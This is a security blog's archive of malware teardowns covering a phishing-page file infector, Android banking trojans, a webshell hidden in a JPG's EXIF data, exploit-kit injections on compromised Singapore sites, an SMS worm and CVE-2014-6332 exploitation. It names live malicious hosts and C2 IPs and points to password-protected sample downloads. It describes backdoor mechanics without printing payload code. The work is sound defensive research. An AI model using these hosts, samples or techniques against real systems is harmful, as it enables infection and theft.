Category Archives: Malware

[ Technical Teardown: Maybank Phishing Malware – Part 1 ]

Recently, Jacob discovered 2 interesting phishing websites, http://maybankk2u[dot]com  and http://maybank2u-my[dot]com This 2 websites had the same identical codes and come with a malware in it.

The malware that we discovered is a file infector virus. It scans the system for .html files, .exe and autorun.inf and insert malicious codes into the files.

[ Sample used in the analysis ]
MD5: 44A604F9D96368A83DF55E19644321D3
SHA1: CDBF41310DAE6EFF1127BB92A217369FD2F90B37896568D4F34528AC20468B5C
Malware Sample: index page
Password is “infected29A”

[Backdoor Analysis]
A brief high level overview of the malware infection process flow.

Figure 1 – Infection process

[ Initial Exploitation ]
The backdoor was dropped onto victims’ machine via a malicious VBScript in phishing home page.

Maybank Phishing homepage

Figure 2 – Maybank Phishing homepage

[ VBScript analysis ]
Scrolling down the html source of the webpage, you will come across a large chunk of alphanumeric text. If you look closer at the start of this large chunk of text, you will see the hexadecimal “0x5A4D” which stands for MZ in ascii. Files that start with a MZ header suggests that it is a PE file. You may refer to the following website http://wiki.osdev.org/PE for more information about PE files.

To download the payload you may either run the VBScript (which I don’t really recommend) or simply copy the entire hexadecimal wall of text into a hex editor and save it as a .exe file.

MZ

Figure 3 – MZ header spotted

MZ-end

Figure 4 – Dropping malware into temporary folder

When the VBScript is executed, it drops an executable into the targets’ temp folder. The file names are hard-coded as the malware author is probably trying to hide the malware in plain sight by using a common windows executable name, svchost.exe

The details of the extracted malware from the HTML is as follows:
SHA256: FD6C69C345F1E32924F0A5BB7393E191B393A78D58E2C6413B03CED7482F2320
VirusTotal Report: 50/54 (link); 2016-02-03 11:56:14 UTC
Compiled Date/Time: 2008-02-12 11:02:20
Packed: UPX

Let’s unpack the malware using UPX tool itself.

upx decompile

Figure 5 –Unpacking using upx -d

The details of the unpacked malware is as follows:
SHA256: 876C5CEA11BBBCBE4089A3D0E8F95244CF855D3668E9BF06A97D8E20C1FF237C
VirusTotal Report: 44/54 (link); 2016-02-02 23:21:33 UTC
Compiled Date/Time: 2008:02:12 12:02:20+01:00

The malware camouflage itself as a bitdefender management console. Another interesting thing to note is that both the product version and the file version seems to be an ip address (106.42.73.61).

stealth

Figure 6 – Possibly IP address

[ Dynamic Analysis ]
Let’s begin our journey in analyzing this piece of malware. The malware author had used anti reversing techniques to deter malware analyst from reversing it. Using IDA Pro to see the binary isn’t of much use. Using Procmon surface some interesting stuff.

writefile

Figure 7 –New file dropped

As we can see from Figure 7, the malware is writing a new executable into “C:\Program Files\Microsoft\DesktopLayer.exe“. After examining the hashes of the newly dropped executable, I can conclude that the malware simply copy and pasted itself into the new location.

processcreate

Figure 8 – Executing DesktopLayer.exe

After the file has been copied to the new location, A ProcessCreate function is called to execute the newly dropped executable. The current executable will then terminates.

DefaultBrowseri

Figure 9 – Executing Default Browser

Analyzing DesktopLayer.exe via olly debugger shows that the malware is attempting to run the default browser in the operating system. For this case here, it is attempting to execute IEXPLORE.EXE. On further examination, we will notice that the malware is actually trying to write process memory into the suspended IEXPLORE.exe process. This technique is known as process hollowing. Once the malware has finished writing its code into IEXPLORE.EXE process, it will then resume the suspended thread.

mutant

Figure 10 – Mutex

Based on Figure 10 taken from process explorer tool. We can observe that the malware uses a unique string (KyUffThOkYwRRtgPP) as it’s mutex.

It is also noted that the malware adds the following key into the registry “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit“. By doing so, it is able to maintain it persistency in the victims’ machine.

registry

Figure 11 – Persistent Registry Key

To get the actual malware codes that is running off IEXPLORE.exe, we would need to attach ollydbg into the running process and by using the OllyDumpEx plugin we can dump out the running process.

The dumped process contains some interesting strings.

processDump_strings

Figure 12 – Script Tags and Autorun?

There are some more interesting strings in the dump that suggests that there is an Antidote for this virus. It also contained the mutex key and a domain name.

otherstrings

Figure 13 – Antidote is available

I am interested in using the antidote. Analyzing the injected process memory dump we come to this assembly codes. To activate the “Antidot”, we would just need to add a registry key; “HKLM\Software\WASAntidot\disable“.

antidote

Figure 14 – Disable Malware

As shown in Figure 15, we can prevent mass infection of the virus by adding the registry key as earlier . We even get to see a nice message box telling us that Antidot is activated.

enabling antidote

Figure 15 – Antidot Activated

The malware loop through the folders in the victims’ machine and edit all html file it come across with the same malicious code we found in the phishing website. It also attempts to infect suitable .exe files with malicious codes. Once these infected executable gets executed, a copy of the same malware will be dropped and executed on the machine.

The malware also infects removable drives by editing the autorun.inf and planting itself in the RECYCLER sub folder. Better unplug your removable drives from the VM before you try analysing this!

The malware attempts to resolve a domain, fget-career.com. It also attempts to resolve google.com.

wireshark

Figure 16 – DNS queries in Wireshark

Spawning Shell

Figure 17 – Spawning Shell

Once the malware calls fget-career url. It can executes shell on the target machine if commands are given.

port 4678

Figure 18 – Open port 4678

The malware also attempts to listen on port 4678.

tcpmon

Figure 19 – Port 4678 Opened

One of the common ways to find infected or breached systems that most AV companies use is using IOC.  We should be looking for known (or suspicious) command and control (C&C) traffic on the network and looking for known bad or suspicious indicators on the hosts.

Based on our dynamic analysis, below are the known IOC that we can scan our PCs.

[ Host based Indicator ]

  1. Mutex – KyUffThOkYwRRtgPP
  2. File – C:\Program Files\Microsoft\DesktopLayer.exe
  3. File – temp folder\svchost.exe
  4. Registry Key – HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
  5. Process – Default Browser with no parent
  6. C:\Program Files\Internet Explorer\complete.dat (Default browser path)
  7. C:\Program Files\Internet Explorer\dmlconf.dat (Default browser path)

[ Network based Indicator ]

  1. fget-career.com (DNS)
  2. User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
  3. Listener on port 4678

[ Whois information ]

Domain Name: MAYBANKK2U.COM
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Sponsoring Registrar IANA ID: 1556
Whois Server: whois.west263.com
Referral URL: http://www.west.cn
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
Status: ok https://www.icann.org/epp#OK
Updated Date: 02-feb-2016
Creation Date: 02-feb-2016
Expiration Date: 02-feb-2017

IP Address:  207.226.137.64

Domain Name: MAYBANK2U-MY.COM
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Sponsoring Registrar IANA ID: 1556
Whois Server: whois.west263.com
Referral URL: http://www.west.cn
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
Status: ok http://www.icann.org/epp#OK
Updated Date: 02-feb-2016
Creation Date: 02-feb-2016
Expiration Date: 02-feb-2017

IP Address:  207.226.137.64

networkwhois

Once again network whois on the suspicious ip we got from the product version earlier on points back to China.

However, based on the analysis done on the malware and based on passive DNS and past whois records from Virustotal and who.is, the ip address we got from product version earlier could likely to be a fake to throw us off.

Another thing to note is that fget-career.com seems to be offline at the moment and it will be expiring in March 2016. Therefore if we are interested to know/plot the infection widespread of this malware or to takeover this malware we can attempt to buy this domain and host our own C&C server.

D O

[ Sharing ] Analysing and retrieving the Statistics from shortened URLs

I’m going to talk about how you can view or check whether someone else clicked on the same shortened url as you.
This is also pretty useful if you want to know whether you are a target of a scam or being targetted to a drive-by.

The url which i’m going to test today is this:
http://www.dailychanges.com/

Let’s go through some of the URL shorteners and how we can get more info from these shortened URLs.
Bit.do
======
The original shortened link is http://bit.do/bKoMw
But if you append a “-” without the double quotes like this http://bit.do/bKoMw-
You will get to the statistics page for this shortened url.
It gave some important information about Referer sites, Referer pages and even visitors IP.
Probably dangerous if users are being targetted.

Next we will talk about Is.gd
Is.gd
======
The original shortened link is http://is.gd/MyG7K6
However, if users want to look at the statistics, they can simply change the url to something like the one below.
http://is.gd/stats.php?url=MyG7K6

Next we will talk about
Goo.gl
======
The original shortened link is http://goo.gl/z8w84
But if you append a “.” without the double quotes or “info” like this http://goo.gl/z8w84+ or http://goo.gl/z8w84.info
Once you go to the statistics pages, you will be redirected to something like this below.
https://goo.gl/#analytics/goo.gl/z8w84/all_time

Next we will talk about
Bit.ly
======
The original shortened link is https://bit.ly/1LsiFyY
But if you append a “.” without the double quotes like this https://bit.ly/1LsiFyY+
Using the statistics page, you can also check which other user are also sharing the exact same url as you did.
Please note that if the other user(s) used Google analytics in the url, you might not be able to see them in your statistics page.

Next we will talk about
crop.is
=======
The original shortened link is http://crop.is/NV8
However, if users want to look at the statistics, they can simply change the url to something like the one below.
http://crop.is/NV8+

tiny.ph
=======
The original shortened link is http://tiny.ph/2mCe
In order to access the statistics, they can simply change the url to something like the one below.
http://tiny.ph/2mCe+

tny.im
=======
The original shortened link is http://tny.im/3Bm
In order to access the statistics, they can simply change the url to something like the one below.
http://tny.im/3Bm+

tiny.cc
=======
The original shortened link is http://tiny.cc/xtad8x
In order to access the statistics, they can simply change the url to something like the one below.
http://tiny.cc/xtad8x~

Then again, if there isn’t any means to check the stats of the shortened URL.
Always make sure to use online services like http://longurl.org/ to make sure the shortened url is not redirecting to some malicious url.

I hope that readers will find all the information written here useful.

Have Phun
Jacob Soo

[ Technical Teardown: Malware Targetting Singapore Banks ]

[ Background ]
Originally i wanted to let one of the local student to write about it but he was busy with school, internship and solving challenges.
It’s also been a very long time since we written any “Technical Teardown” on malware/exploits here.

I got hold of this particular malware sample just days after these 2 reports.
http://www.abs.org.sg/pdfs/Newsroom/PressReleases/2015/MediaRelease_20151201.pdf
http://www.channelnewsasia.com/news/singapore/50-smartphone-users-in/2308976.html

The Association of Banks in Singapore (ABS) released an advisory to alert consumers on malware targeting mobile banking customers in Singapore.
We hope this technical teardown might be interesting to some of you.

[ Sample used in the analysis ]
MD5: 76745CE873B151CFD7260E182CBFD404
SHA1: 0F7C012466157891C1D12ADDDD4DFA0B8291DD75
Malware Sample: 76745ce873b151cfd7260e182cbfd404
Password is “infected29A”

Since it’s an Android malware, let’s check the permissions of this malware and further dissect it. Now, use apktool and run the following command:

Now let’s take a look at the AndroidManifest.xml file, you should see the following and the permissions requested by the APK file.

As we can see from the AndroidManifest.xml, it ask for quite a lot of permissions and it’s probably obfuscated.

Looking at the strings.xml and styles.xml, we can see that customised themes had been created for various banking applications.
This malware targets a number of banks by trying to mimic the authentic one and phishes for important banking information from the infected user as shown below.
0x0003
Figure 1 – Customised Themes

[ Junk Codes as Anti-Analysis? ]
It took me 20-30mins to realise that this author uses lots of junk code. Possibly with the purpose of deterring people like me from reversing the malware.
Import metadata such as strings and function names are also obfuscated as shown in the image below.
0x0001

Figure 2 – Junk Code with no useful functionality

Since the malware sample is heavily obfuscated, some of the things that i usually look out for is commands like Base64.decode or loadDataWithBaseURL or sendTextMessage

[ Revealing of Hidden Configuration Strings ]
So i did a quick grep and found out that it did use “Base64.decode” as shown below.
0x0002
Figure 3 – Base64 encoded string

The following is the base64 string which i extracted from the malware.

After doing a base64 decoding on it, i got back the following strings.

As we can see, the decoded strings contained IP addresses and other interesting strings. We also can safely assume that the malware author uses “@” as a delimiter.
For better illustration, i replaced all the “@” with newline.

[ Assessment of Malware ]
We can see that the IP addresses are the C&C servers communicating on port 34580.
http://37.235.48.177:34580/
http://46.108.39.12:34580/

Within the malware sample, we also found out that it is targeting victims with the following bank accounts.
Austria
=======

Dexia Kommunalkredit Bank
Bank Austria
Erste Bank und Sparkassen (Thanks to Alex Inführ for pointing my mistake.)
RGB (Raiffeisen Banking Group)
George (https://mygeorge.at/)
DK (Deutsche Kreditbank AG)
Bawag (BAWAG P.S.K)

Australia
=========

Westpac
St George
Gomoney
National Australia Bank
Commbank

New Zealand
===========

Westpac
Bank of New Zealand
ANZ Bank New Zealand

Singapore
=========

DBS
OCBC
POSB

Hong Kong
=========

Citibank
Bank Of China
Hang Seng Bank
Breeze

I’ll update this post later on how we can reverse such malware much more easily.
In the meantime, i do hope you enjoy reading it.

Happy Reversing,
Jacob Soo

[ Walkthrough : SyScan 2015 Badge Challenge ]

2days ago, a few of us recently went to SyScan and completed the Badge Challenge that was put together by the SyScan crew.
Here is the a short writeup of our experience with all of the puzzles, their solutions, and the steps to solve them.
Of course, @miaubiz gave us a huge clue for solving the last stage and he also found the “Easter Egg” or “Debug Mode” in it.

Spoiler Alert: The following article is a detailed and methodical walk through of how to solve the challenge.
So please do take note and understand that this document contains MASSIVE spoilers!
If you’d rather try it for yourself, stop reading now and go and play NOW!

 

 

 

 

 

 

 

 

 

 

 

 

Still here?
Alright, lets go!

[ Stage 1 ]

One of the options we had when we power up the badge is “Unlock 1”
So we tried a bunch of options like “Open”, “Open Sesame”, “Open now God Damn It”. But we are always returned with the following QR Code.
IMG_0073
The above QR Code translate to “Try \”Unlock\”
So we thought, why not just try “Unlock”

Surprisingly, we got back another QR Code.
IMG_0075
This QR code translate to “insufficient privilege
Initially, we thought that maybe we need to have a special “Username” before we can unlock this.
So we started brute-force all the possible “usernames” used by “admin”.
But all these still failed until after the 1st tea break, we tried “sudo unlock” as shown in the image below.
IMG_20150328_012534288[1]
w00t h00t, we have successfully unlocked “Stage 1

[ Stage 2 ]
When we tried to unlock “Stage 2” using the same password as “Stage 1”, we got back something that looked like “morse code
IMG_20150328_012730132[1]
After decoding the “morse code“, we got back “ttall
We tried that but alas, it didn’t work at all. Then Thomas give everyone this clue, it’s not a full morse code.

We are wondering could it be “–all” since it sounds and looks like it.
So we entered “–all” but it wasn’t the key to “Stage 2
After another round of tea break, we thought whether could it be that “–all” is be appended to the answer for “Stage 1
So we tried “sudo unlock –all“. “Stage 2” unlocked.

[ Stage 3 ]
For “Stage 3“, we saw a new option for us to choose, “Crypt-analysis
Firing this option, we can see the following instruction.
IMG_0084

Our initial thoughts were, “Let’s use Base32 to decrypt it”.
However, we tried and it failed. We overcome this when @miaubiz gave me a clue, “Try bit flipping technique like +1 and -1 to the character.”
So we listened to his sagely advice and start brute-forcing by using “Ask Oracle
For simplicity sake, we tried the first 2 characters and we saw this english looking-like word.
IMG_0085

srueamishossifrage” seems like an english word so we started “Googling” for this word but no results…then we pondered for a while and realised it could be “squeamishossifrage” and we found this page.
Hmmmm…”The Magic Words” and “Cipher” were found in this Wikipedia page.

So we tried “squeamishossifrage” and Bingo we solved this.
IMG_0086

[ Easter Egg or Debug Mode ]
@miaubiz found this interesting “Easter Egg” or is it “Debug Mode“. It bypass “Stage 1” and “Stage 2” and go straight to “Stage 3“. O_O

So what @miaubiz did was took out the battery, push the joystick to “Up” position and then re-inserted the battery.
Next thing you know, the username is adm1n and you have reached “Stage 3

This “Easter Egg” is useful if you don’t want to keep repeating the process of solving the first 2 stages if your badge resets itself back to default.

Let me repeat this again. @miaubiz is a GENIUS.

Another thing we found out but we are still unclear what use does it have is the secret number in “Waste of Time

When you start the Game, it showed “Game of Life”. One of us are very familiar with “Game of Life” and immediately he found this secret number.
IMG_0064
Could “Godfather” Thomas Lim be giving us 8696 as the winning number for this week’s 4D? xDDD

We hope that this walkthrough is simple to understand. Please let us know if we did anything wrong in our process in solving this.

Well, all the guys here wished that the “Godfather” Thomas will organise another wonderful .SG conference in 2016 if there is no SyScan 2016….or will SyScan 2016 happen? xDDD

Happy Reversing,
Jacob, Damian & Glenn

[ Technical Analysis: Deceiving ‘Parked Domain’ & several .SG sites serves exploits ]

I have reported the following Singapore website(s) which might be serving malicious content to SingCERT back in 29th November 2014.
But i have just checked today and all of these site(s) are still serving the same malicious content.
Even though they told me back in 1st December that they have notified all relevant partie(s). O_o”

For the 1st website, I happened to chanced upon this while checking out of Lego related stuff.
Severity: Malware Hidden Inside JPG EXIF Headers
Confidence: Certain
Host: h–p://www[.]thebroerscafe[.]sg
Path: /wp-content/uploads/2013/05/Lego-workshop[.]jpg

Issue Description:
The malicious content hide its data in the EXIF headers of a JPEG image.
So how does malicious content in the EXIF headers of a JPEG image get executed.
Basically, it used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.
If you were to view the EXIF info of the following image:
h–p://www[.]thebroerscafe[.]sg/wp-content/uploads/2013/05/Lego-workshop[.]jpg

You will see something like this.

Image 1 : Exif info of Malicious JPG file

So if you look at it from Notepad++ or from a Hex Editor.
It’s hidden here as shown in the image below.

Image 2 : Malicious JPG opened in Notepad++

Please note the EXIF PHP code in Model information, but also the string /.*/e in Maker.
Once the base64 string is being decoded, the code translates into:

Basically, it evaluates whatever it gets through the POST parameter zz1.
But this is an image, how does this code get executed?
Thanks to the PHP exif_read_data function –

The PHP function preg_replace will interpret the content as PHP code thanks to the string /e (the Maker field in the EXIF data). This will execute the eval code in the second EXIF field (Model). So basically this is a backdoor that will execute any command inside the zz1 POST parameter. The /e pattern modifier is deprecated since PHP 5.5.0, thats good news.

So basically this is a two component backdoor that comprises of a JPEG file with malicious EXIF data, and a PHP code that executes it.
This PHP code can be easily inserted into any other PHP file found in the server, probably not noticed easily.

As the website is using TimThumb and TimThumb had been known to have several security vulnerabilities for years. I would probably recommend the website owner to discontinue the usage of TimThumb.

If anyone is interested to learn about about this, you can read it here.
Related Links:
http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html
http://securelist.com/blog/research/58196/malware-in-metadata/

For the 2nd website,
Severity: Redirection to possibly ExploitKit
Confidence: Certain
Host: h–p://www[.]hinhuatdj[.]com
Path: /index[.]html

Issue Description:
If you take a look at page source of index.html, you will find this malicious Javascript at the bottom of the page.

Image 3 : Source of Index.html in www[.]hinhuatdj[.]com

Please don’t run the script unless you know what you are doing. Once you safely decoded it, you will see this.

Image 4 : Decoded Javascript pointing to Malicious website

A quick check against VirusTotal, you will see that it’s been flagged as malicious previously by Kaspersky and Sucuri

This is the Virustotal report on the website.
https://www.virustotal.com/en/url/57186289dcea318fc52dbfe1ccd850cb5c2e1ffdf3b6be136330cfad1a169f40/analysis/1417239062/

For the 3rd website,
Severity: Compromised website
Confidence: Certain
Host: h–p://www[.]mdas[.]org[.]sg
Path: /

Issue Description:
If you were to view the page source of the website in a safe manner.
You will be able to see that the page had been injected with malicious html codes as shown below.
The links seem to be be porn urls.

Image 5 : Injected html codes

Visitors to this website might accidentally clicked on the porn urls and potentially be exposed to other malicious stuff..
The IP address of this website is currently at 111.235.138.70
111.235.138.70 currently belongs to Vodien Internet Solutions Pte Ltd which is a local web hosting company.

For the 4nd website,
Severity: ExploitKit
Confidence: Certain
Host: h–p://333bakkutteh[.]com
Path: /index[.]html

Issue Description:
If you were to view the page source of the website in a safe manner. You may find that this website is currently being “Parked” or not in use.

However, if you were take a look at page source of index.html, you will find this malicious Javascript at the bottom of the page.

Image 6 : Injected html codes

Based on personal experiences, i can straight away recognise this as ExploitKit.
Visitors to this website will be exposed to the exploits served by this ExploitKit immediately.
The IP address of this website is currently at 112.140.185.140
112.140.185.140 currently belongs to sparkstation.net which is a .SG web hosting company.

For the 5th website,
Severity: Serving ExploitKit
Confidence: Certain
Host: h–p://fonghsiang[.]com[.]sg/
Path: /

Issue Description:
If you were to view the page source of the website in a safe manner.
You will be able to see that the page had been injected with malicious html codes as shown below.

Image 7 : Injected html codes

For the 6th website,
Severity: ExploitKit
Confidence: Certain
Host: h–p://hychem-ap[.]com[.]sg
Path: /

Issue Description:
If you were to view the page source of the website in a safe manner.
You will be able to see that the page had been injected with malicious html codes as shown below. It’s the same as the 5th website.

Image 8 : Injected html codes

For the 7th website,
Severity: ExploitKit
Confidence: Certain
Host: h–p://actinium[.]sg/
Path: /

Issue Description:
If you were to view the page source of the website in a safe manner.
You will be able to see that the page had been injected with malicious html codes as shown below. It’s the same as the 5th website.

Image 9 : Injected html codes

Based on personal experiences, i can straight away recognise that all are ExploitKit.
Visitors to these website(s) will be exposed to the exploits served by this ExploitKit immediately.
The IP address of both h–p://fonghsiang[.]com[.]sg/ & h–p://hychem-ap[.]com[.]sg are currently at 203.142.25.182 & h–p://actinium[.]sg/ is currently at 202.157.153.5

Both 203.142.25.182 & 202.157.153.5 currently belong to Webvisions Pte Ltd which is a .SG web hosting company.
The impact of these domains is that innocent visitors with no protection could become the next victims if both the malicious scripts and C2 are still working.
This is a “REMINDER” to everyone not to trust a “site” by its cover and always exercise caution. Attacker(s) are always thinking of new ways to trojanised victim(s).
The attacker(s) here are clever to hide the malicious code like they did here because they can easily trick victim(s) who might have thought that the site(s) as “already expired” or “suspended” by the hosting provider”.
But in reality, it’s not the case.

Happy Reversing
Jacob Soo

[ Technical Teardown: PHP WebShell ]

[ How it starts ]
Today, my personal scanner found yet another PHP WebShell.
Since we at VXSecurity.sg haven’t write anything on PHP WebShell, I will be writing one on it today.
So what is a “PHP WebShell”?
A PHP WebShell can give a malicious hackers access to perform the following actions:

  • Archive or extract files
  • Brute-force logins for FTP, MySQL, pgsql
  • Create or delete folders
  • Download files
  • Encode or decode files
  • Open a bash shell command, which allows the remote attacker to execute remote commands
  • Open files
  • Rename files
  • Run SQL commands
  • Search folders
  • Show active connections
  • Show computers the infected computer had access to
  • Show running services
  • Show user accounts
  • Show IP configuration
  • Connects to certain servers

A PHP WebShell also allows attacker(s) to connect to the server(s) for the purpose of receiving arbitrary information, sent by a malicious hacker, about your PC and/or server.
Today, i found this PHP WebShell from http://www[.]motorossarkany[.]hu/images/hir_41_1[.]jpg

[ Sample used in the analysis ]
MD5: 379f63c3df8570a479017757c0826d2e
SHA1: 3f86bd230c01c54d356d910c5ba161b2857ee5fb
PHP WebShell Sample
The pw to the zip is “infected29A

[ Tool Used ]
Notepad++

[ Analysis of the .JPG file ]
If we were to use any hex editor or Notepad++ to open up this .jpg file, the following image is what you will see.

php.webshell.01 Image 1 : hir_41_1.jpg

We can see right here that it’s basically a .php file instead of a .jpg file.
In this case, we can safely say that the .htaccess file is set to run JPG as PHP files. This is why although the file extention is GIF or JPG the PHP code will be executed.

Let’s try decoding the top portion of the script and we should get back this..

Hmmm…seems like $_F and $_X is not used. Or is it?
As we reach the bottom of the file, we saw another interesting part of the script as shown in the image below.

php.webshell.02 Image 2 : Decoding 2nd part of the PHP WebShell

As we can see here, we already got the value of “$OOO0000O0“. The value is “base64_decode”
So basically, it’s just base64 decoding of

Image 3 : String to be base64 decoded

After we had base64 decode it, we will get back the following piece of code.

To avoid anyone from accidentally running the script.
Just replace the above code snippet with the following code snippet.

Now if you run the script again, you should be able to get back 2 .txt files (“file_x.txt” & “file_R.txt”).
I did this just to show you what are the differences between the 2 for those who are not familiar with PHP.

Ok we should be able to see the actual PHP WebShell as shown below.
php.webshell.03
Image 3 : Final Deobfuscated PHP WebShell

So the things that i hope SysAdmins learnt here is that always do your due diligence checks on your webserver and check your .htaccess files if there are any.
If you see new image files and lots of entries in the access logs, do check the files.

I hope this is useful to someone out there.

Happy Reversing
Jacob Soo

[ Technical Analysis: Scoop.apk ]

[ How it starts ]
I started to write about this particular malware before Christmas in 2014 but it was left sitting in the draft for so long until i decided to take a break from #EquationAPT today. It all started when i got a sms as shown below.

IMG-20141220-WA0002
Figure 1 – Initial SMS

I hardly take any photos and the Sarah i knew don’t even SMS me. So i found a bit weird. So what is special about this sample was that it uses a technique typical of computer worms to spread itself.

This particular piece of malware rely on social engineering to convince the user to click on the shortened link in the sms and install/run the malicious APK package.

[ Sample used in the analysis ]
MD5: 9187B180E741312AA0FF36EF6FE7DC51
SHA1: 322ABA633607F635F5581E8D7F53794566BCB80B
Malware Sample: Scoop
Password is “infected29A

[ Initial Analysis ]
Since it’s an Android malware, let’s check the permissions of this malware and further dissect it. Now, use apktool and run the following command:

Now let’s take a look at the AndroidManifest.xml file, you should see the following and the permissions requested by the APK file.

As you can see from the AndroidManifest.xml, it ask for quite a lot of permissions.

[ SMS Propagation ]
One of the more interesting functions that i’ve found is how it tried to spread itself.
As you can see from the image below.
sms.sending.code
Figure 2 – The worm’s SMS sending code

What is rather typical of this malware is that it is leaking SMS messages, call history & contact lists of the victim(s).
One of the characteristic of this malware is that it will fetch data from one of the hardcoded URLs in the APK with a HTTP POST.
The typical data that it will fetch will look like the code snippet below.

Other interesting stuff is that it will go to “http://topemarketing.com/app[.]html” to fetch a new copy of Scoop.apk

The malicious url in the SMS, https://bit[.]ly/s_-c will redirect you to http://secret-message[.]net/

This malicious page will refresh and direct user to this malicious .APK file.

As i’ve already done quite a number of articles on reversing Android Malware.  Today we will be going through other stuff which might aid us in our investigation and see how this malware operate. The interesting thing here is we can see the statistics kindly provided to us by Bit.ly for all Bit.ly shortened URLs by appending a “+” sign without the double quotes like this:
https://bitly[.]com/s_-c+

You will see the stats as of then when i analyse this .apk. From the statistics given, we can see that most of the target(s) are from Singapore. 🙁

secret-message.net.001

Figure 3 – Statistics of bit.ly url

What is even more interesting sir, the same author of the malicious .APK file actually got several other domains spreading same .APK file.
You can check out the other shortened bit.ly links by the same guy here.
https://bitly.com/u/othv2

Interestingly, one of the links leads to the Android app in PlayStore.
https://play.google.com/store/apps/details?id=com.savemebeta

secret-message.net.002

Figure 4 – Another app by Malware Author

Sadly, the app was removed before i downloaded it.  The URL in the PlayStore belongs to same domain as the other malicious links.

Could it be same guy? 😛

topemarketing[.]com points to 162.255.116.80
tombolaworld[.]com points to 192.64.112.120
secret-message[.]net points to 62.210.83.139

One other interesting thing is…2 of the domains are bought around 2009 and 2010 and expired in 2011 according to who.is as shown here. http://who.is/domain-history/topemarketing.com

But did this guy bought them in 2014?
Or did she/he bought all those expired domains so that user(s) might think it’s still legit. Or it had been the malware author all along and she/he decides to use WhoisGuard later on.  Probably need the whois records to verify here. 🙁

The worm is targeted mostly against Singapore and French Android users according to the statistics from Bit.ly.  Not sure why the domains are still alive.  Our advice to user(s) on how they can protect themselves effectively are:

  1. Restrict the installation of applications from unknown source
  2. Don’t click on suspicious links as Malware authors might use it as their social engineering tricks
  3. Always use an updated anti-virus solution on your Android device if you don’t know how to analyse the application

Happy Reversing,
Jacob Soo

[ Sharing ] More ITW Exploitation of Internet Explorer ‘Unicorn bug’ found

These few days i have seen friends asking me whether i have seen any sites during work using CVE-2014-6332.
Sad to say, i can’t talk about work. So today i will talk about what i’ve seen during my free personal time.

[ How it starts ]
So what is this vulnerability known as CVE-2014-6332?
This is an interesting bug as it exploits Internet Explorer versions 3 through 11. This means that most if not all of Internet Explorer users are vulnerable unless they are using patched systems. It was first disclosed publicly by @yuange75 here back in 01st August 2014 : http://hi.baidu.com/yuange1975/item/c667f900cf0e2fc02e4c6bed
However he found it long long ago.

I guess it’s only a matter of time that “malware writers” start using this knowledge and use it as part of their cybercrime. I’m not from any AV companies nor ThreatIntel team selling “APT” news, but i do want more people to know that there are now several compromised website(s) that are using this CVE-2014-6332 vulnerability to install malware on the computers of its unsuspecting visitors.

[ Compromised Website details ]
The very first one that i found is from www[.]uyghurweb[.]net
The page source contains 2 interesting thing that caught my “eyes”.

The 1st one is “http://122[.]10[.]91[.]20/2013/frame.js” but it’s down when i tried to grab it.
The other being the other JavaScript(s) in the page.

The one that is more interesting is “js/udg.js” as it’s actually redirecting visitors to another website serving “CVE-2014-6332

As you can see, the exploit is hosted on the domain “http://www[.]owner[.]com[.]tw
If you have seen the source of “new.htm” as shown below.
owner.com.tw.01
It looks almost identical to the one shared by @yuange75. I suppose this malware writer is quite lazy to change anything to it.

I actually found a total of 7 but some are sensitive to be shared. One of it was disclosed by ESET here:
http://www.welivesecurity.com/2014/11/20/first-exploitation-of-unicorn-bug/
The other 3 non-sensitive sites that i’ve found are from:
http://finance[.]cedare[.]int/luz.htm
http://www[.]edicot[.]com/lulz.htm
http://www[.]e-ctasia[.]com/lulz.htm

But interestingly for these 3, all are showing “Hacked by LulzSec” and the following is found in the page source.

My guess is the first one is probably not related to the other 3. But one thing is for sure, there are more of these websites serving “CVE-2014-6332” as we speak.
I’ll probably blog about the payload later.

[ Conclusion ]
Although i do not have the mass amount of data as AV companies or ThreatIntel companies to offer IOC (Indicators of Compromise), but i guess if i can find a few website(s) within a week. I suppose it’s is just a matter of time before ExploitKit(s) integrate this vulnerability to their existing toolkit. Since most of the Internet Explorer versions were affected, I guess user(s) of Internet Explorer should just update IE NOW!!!!!.

Happy Reversing
Jacob Soo

[ Technical Teardown: HongKong Protest Malware ]

[ How it starts ]
It all started when we saw Tsui Lokman mentioned about an executable that they received and it could be a malware.
This particular piece of malware could potentially be used to target Hongkongers participating in #OccupyCentral & #UmbrellaMovement .
Being the curious cat(s), we started asking for a copy of it to analyse it.

[ Sample used in the analysis ]

[ Updates ] Since @vietwow requested for a copy of the sample.
We have attached it here like always.
Letter To Hong Kong 20141011_pdf_viewer. The pw to the zip is “infected29A
[ Tool Used ]

 

[ Analysis of Dropper ]
1) The executable is being camouflaged as an adobe executable (pdf viewer) by using an adobe icon as shown here.
logo
Image 1 : Screenshot of Dropper

A Microsoft Excel Icon is also found in the executable as well (using resource hacker tool). However the icon is not used at all. Probably there is another version of the dropper that disguise itself as a Excel document.

resource hacker Image 2 : Extra icon using ResHacker

2) Upon execution of the dropper, the malware copied itself to C:\Documents and Settings\Administrator\Application Data\WMService.exe. The path that the malware copied to varies depending on the operating system versions. For Win XP, the path would be [drive]:\Documents and Settings\[User Name]\Application Data\WMService.exe] while for vista and above the path would be [drive]:\Users\[User Name]\AppData\Roaming\WMService.exe.

envImage 3 : Screenshot of Dropped location

The first function of interest when running the malware is the decryption of the encrypted strings in the program. @address 00403E9A we can see that there is a function call to address 00401F70.

decrypt

 Image 4 : List of Encoded Strings

From the above assembly codes, we can see several encrypted strings. Note that there are several calls to function 00401AAE. This function is called to decrypt the encrypted strings. Instead of going through the decryption routine… my approach is to use ollydbg to help me to decrypt the strings in runtime as shown below.

decrypted

 Image 5 : List of Decoded Strings

now we can make a better educated guess on what the malware is doing with the decrypted string. Previously IDA Pro strings did not really churn out any useful strings for us but with the decrypted strings we can see the evil server domain name.

Moving on we can see that after the decryption routine, an argument -st is supplied to the executable.
On analyzing the dropper via IDA Pro, the dropper has 2 distinct paths.
